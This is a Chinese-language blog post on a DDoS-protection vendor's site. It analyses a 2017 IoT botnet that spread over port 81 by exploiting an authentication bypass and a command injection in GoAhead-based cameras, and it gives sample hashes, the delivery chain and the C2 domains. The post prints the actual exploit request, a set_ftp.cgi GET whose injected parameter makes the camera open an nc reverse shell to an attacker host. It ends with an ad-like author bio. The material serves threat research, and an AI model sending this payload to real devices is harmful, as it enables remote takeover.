DDOS防御专家-提供超强DDoS高防/CC防护/大流量清洗服务!
当前位置:主页 > DDOS防御 > 正文

一个新IoT僵尸网络正在 HTTP 81上大范围传播

09-17 DDOS防御

网络安全研究院近日监测到一个新的僵尸网络正在大范围扫描整个互联网。考虑到该僵尸网络的以下因素,我们决定向安全社区公开我们的发现成果:
1、规模较大,我们目前可以看到 ~50k 日活IP
2、有Simple UDP DDoS 攻击记录,可以认定是恶意代码
3、较新,目前尚有较多安全厂商未能识别该恶意代码 ( 7/55 virustotal )
4、与mirai僵尸网络相比,借鉴了其端口嗅探手法和部分代码,但是在传播、C2通信协议、攻击向量等关键方面完全不同于mirai,是新的恶意代码家族而不应视为mirai的变种
我们梳理了该僵尸网络的发现过程、传播手法、行为特征,简略分析了该僵尸网络的攻击行为,并按照时间线组织本blog的各小节如下:
1、GoAhead及多家摄像头的 RCE 漏洞
2、攻击者将漏洞武器化
3、我们注意到了来自攻击者的扫描
4、从扫描到样本
5、C2 历史变化回溯
6、僵尸网络规模判定
7、关于 212.232.46.46 我们的观察
8、IoC
GoAhead 及多家摄像头的 RCE 0Day漏洞
研究人员 Pierre Kim (@PierreKimSec) 于 2017-03-08 发布了一个关于GoAhead 以及其他OEM摄像头的脆弱性分析报告。在设备厂商归属方面,原作者指出由于设备OEM的原因,共涉及了超过 1,250 个不同摄像头厂商、型号;在潜在感染设备方面,原作者利用Shodan 估算有超过 185,000 个设备有潜在问题。
在原始文章中, 原作者指出 GoAhead 摄像头存在若干问题,其中包括:
1、通过提供空白的 loginuse 和 loginpas 绕过认证环节,下载设备的.ini 文件
2、通过向 set_ftp.cgi 中注入命令,获得root权限,并在设备上提供远程 Shell
原作者指出攻击者组合使用上述问题,就可以在完全没有设备口令的情况下,获得设备的root权限,并提供了一个利用代码。
在上述页面中,可以关联到原作者和其他安全社区反馈的信息。综合这些反馈,我们并没有观察到没有设备厂商积极行动起来,为本脆弱性提供解决方案,原因也许是OEM厂商之间错综复杂的关系,不过正是因为迟迟没有原始厂商采取行动,才给了攻击者继续发挥的空间。
攻击者将漏洞武器化
事后看,我们认为攻击者在原始PoC公布后,花了不超过1个月的时间将上述漏洞武器化,并在2017-04-16 成功引起了我们的注意。
我们实际看到武器化后的payload 有如下特点:
1、嗅探端口从 80 改为 81
2、嗅探端口时采用类似mirai 的 syn scan 过程
3、嗅探 login.cgi 页面,猜测攻击者通过这种方式进一步精确甄别受害者。上述三个做法可以提高僵尸网络感染的效率
4、使用前文提到的 goahead 0-day 漏洞,投递载荷
5、我们尚没有直接证据,但是有理由怀疑攻击者在成功获得设备root权限以后,阻断了载荷投递通道,避免后来者经同样路径争夺设备控制权
我们注意到了来自攻击者的扫描
我们首次注意到本次事件,是来自我们的全球网络扫描实时监控系统:

一个新IoT僵尸网络正在 HTTP 81上大范围传播


图1 port 81 scan bigbang since 2017-04-16
从图中我们可以看到,2017-04-16 是个关键的时间点。取 2017-04-15 与之后的数据对比,当日扫描事件数量增长到 400% ~ 700% ,独立扫描来源增长 4000%~6000%。特别是2017-04-22当天扫描来源超过 57,000,这个数字巨大,让我们觉得有必要向安全社区提示这个威胁的存在。

一个新IoT僵尸网络正在 HTTP 81上大范围传播


图2 detailed volume compare
从扫描到样本
载荷
注意到该扫描以后,我们就开始了对该威胁的追溯和分析工作。通过我们的蜜罐系统,我们捕获了下面这组样本。需要预先说明的是,虽然这组样本的命名中包含 mirai 字样,但是这一组样本的工作方式不同于mirai,并不能视为mirai的变种,而应该作为一个新的威胁来对待。

cd20dcacf52cfe2b5c2a8950daf9220d wificam.sh 428111c22627e1d4ee87705251704422 mirai.arm 9584b6aec418a2af4efac24867a8c7ec mirai.arm5n 5ebeff1f005804bb8afef91095aac1d9 mirai.arm7 b2b129d84723d0ba2f803a546c8b19ae mirai.mips 2f6e964b3f63b13831314c28185bb51a mirai.mpsl
这组样本的文件信息如下:
mirai.arm: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
mirai.arm5n: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
mirai.arm7: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
mirai.mips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
mirai.mpsl: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
wificam.sh: ASCII text
载荷的投递方式
在攻击者完成嗅探81端口确认存活以后,通过以下方式投递有效载荷:
1、攻击者在上文PoC基础上,注入命令迫使受害者设备发起nc连接到 load.gtpnet.ir:1234
2、攻击者控制load.gtpnet.ir:1234 对每个受害则发起的连接,投递了 hxxp://ntp.gtpnet.ir/wificam.sh 作为后续下载的中转,并通过该脚本进一步从 hxxp://ntp.gtpnet.ir/ 服务器下载命名为 mirai.arm/mirai.arm5n/mirai.arm7/mirai.mips/mirai.mpsl 的样本
3、这些样本会进一步与控制服务器建立连接,到此,受害者设备完全被攻击者控制,感染阶段结束,准备发起攻击。
上述三段攻击方式对应的代码如下:
1、命令注入阶段,迫使受害者建立nc连接到 load.gtpnet.ir:1234
GET login.cgi HTTP/1.1
GET /set_ftp.cgi?loginuse=admin&loginpas=admin&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+load.gtpnet.ir+1234+-e+%2Fbin%2Fsh%29 HTTP/1.1

版权保护: 本文由 DDOS防御专家 原创,转载请保留链接: http://sskjddosgb11.ddosgb.com//ddos1/83.html

DDoS防御专家简介孤之剑
国内资深白帽子二十人组成员,前BAT资深网络安全工程师,知名网络安全站点板块大神,每年提交Google及微软漏洞,原sina微博负载插件开发者,现在整体防御复合攻击长期接受1-4.7T攻击,CC防护自主开发指纹识别系统,可以做到99.9999%的无敌防御。
  • 文章总数
  • 700565访问次数
  • 建站天数
  • 友情链接

    DDOS防御

    ddos防御

    cc防护

    web安全

    高防服务器

    高防cdn


    QQ客服

    400-0797-119

    X